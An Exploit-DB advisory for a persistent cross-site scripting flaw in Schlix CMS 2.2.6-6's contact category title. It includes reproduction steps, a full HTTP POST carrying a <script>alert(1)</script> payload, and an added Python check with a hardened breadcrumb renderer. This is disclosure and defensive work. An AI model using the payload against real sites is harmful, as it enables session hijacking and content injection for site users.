Schlix CMS 2.2.6-6 – ‘title’ Persistent Cross-Site Scripting (Authenticated)

  • Author: Emircan Baş
    Date: 2021-05-06
  • Source: https://www.exploit-db.com/exploits/49837/
  • # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
    # Date: 2021-05-05
    # Exploit Author: Emircan Baş
    # Vendor Homepage: https://www.schlix.com/
    # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
    # Version: 2.2.6-6
    # Tested on: Windows & WampServer
    
    ==> Tutorial <==
    
    1- Log in with your account.
    2- Go to the contacts section. The directory is '/admin/app/contact'.
    3- Create a new category and type an XSS payload into the category title.
    4- The XSS payload is executed when we navigate to the created page.
    
    ==> Vulnerable Source Code <==
    
    <article class="main category">
    <div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
    <div class="media-header-title container d-flex h-100">
    <div class="row align-self-center w-100">
    <div class="col-8 mx-auto">
    <div class="text-center">
    <h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NOT EXECUTED HERE
    </div>
    </div>
    </div>
    </div>
    </div>
    <div class="breadcrumb-bg">
    <div class="container">
    <div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="https://www.exploit-db.com/cms">
    <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="https://www.exploit-db.com/cms/contacts/">Contacts</a></li><li class="breadcrumb-item">
    <a href="https://www.exploit-db.com/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED HERE
    </div>
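The rendered page above shows the pattern behind the bug: the same title is HTML-escaped in the `<h1>` but inlined raw in the breadcrumb link. As an added example (not part of the advisory or of Schlix), the check below counts escaped versus raw reflections of a stored title in rendered HTML, so a fix can be verified at every sink, and shows a hardened breadcrumb renderer; the title and page fragment are constructed samples.

```python
"""Added example: verify where a stored title is reflected unescaped, and
render the breadcrumb sink safely. Not Schlix code; sample data is constructed."""
import html
import re

# Constructed sample mirroring the advisory's page: escaped in <h1>, raw in
# the breadcrumb anchor.
TITLE = '<script>alert(1)</script>'
RENDERED_PAGE = (
    '<h1 class="item title" itemprop="headline">'
    + html.escape(TITLE, quote=True) + '</h1>'
    '<li class="breadcrumb-item"><a href="/contacts/script-alert-1-script/">'
    '<script>alert(1)</script></a></li>'
)


def reflections(user_input: str, page: str) -> dict:
    """Count HTML-escaped and verbatim occurrences of user_input in page.
    Any 'raw' hit for input that needed escaping is a candidate XSS sink."""
    escaped = html.escape(user_input, quote=True)
    if escaped == user_input:
        # Nothing to escape, so verbatim reflections are harmless.
        return {'escaped': page.count(user_input), 'raw': 0}
    return {'escaped': page.count(escaped), 'raw': page.count(user_input)}


def render_breadcrumb(title: str, slug: str) -> str:
    """Hardened rendering of the breadcrumb item: the title is escaped for an
    HTML text context and the slug (the CMS's virtual_filename) is restricted
    to a conservative charset so the href cannot be broken out of either."""
    if not re.fullmatch(r'[a-z0-9]+(?:-[a-z0-9]+)*', slug):
        raise ValueError('slug must be lowercase letters, digits and hyphens')
    safe_title = html.escape(title, quote=True)
    return (f'<li class="breadcrumb-item"><a href="/contacts/{slug}/">'
            f'{safe_title}</a></li>')


if __name__ == '__main__':
    print(reflections(TITLE, RENDERED_PAGE))      # {'escaped': 1, 'raw': 1}
    print(render_breadcrumb(TITLE, 'script-alert-1-script'))
```

Run the check against the full rendered category page before and after a patch: a non-zero `raw` count means at least one template still emits the title without encoding.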
    
    ==> HTTP Request <==
    
    POST /admin/app/contacts?action=savecategory HTTP/1.1
    Host: (HOST)
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
    Content-Length: 4146
    Origin: (ORIGIN)
    Connection: close
    Referer: (REFERER)
    Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
    Upgrade-Insecure-Requests: 1
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="_csrftoken"
    
    49feefcd2b917b9855cd55c8bd174235fa5912e4
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="cid"
    
    6
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="parent_id"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="guid"
    
    ee34f23a-7167-a454-8576-20bef7575c15
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="title"
    
    <script>alert(1)</script>
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="virtual_filename"
    
    script-alert-1-script
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="summary"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="description"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="meta_description"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="meta_key"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="tags"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="date_available"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="date_expiry"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="items_per_page"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[]"
    
    display_pagetitle
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[]"
    
    __null__
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[]"
    
    display_child_categories
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[]"
    
    __null__
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[]"
    
    display_items
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[]"
    
    __null__
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[child_categories_sortby]"
    
    date_created
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="options[items_sortby]"
    
    date_created
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="permission_read_everyone"
    
    everyone
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="permission_read[]"
    
    1
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="permission_read[]"
    
    2
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="permission_read[]"
    
    3
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="permission_write[]"
    
    1
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="cmh_media_selection"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="cmh_media_upload"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="cmh_media_path"
    
    
    -----------------------------280033592236615772622294478489
    Content-Disposition: form-data; name="cmh_media_url"
    
    
    -----------------------------280033592236615772622294478489--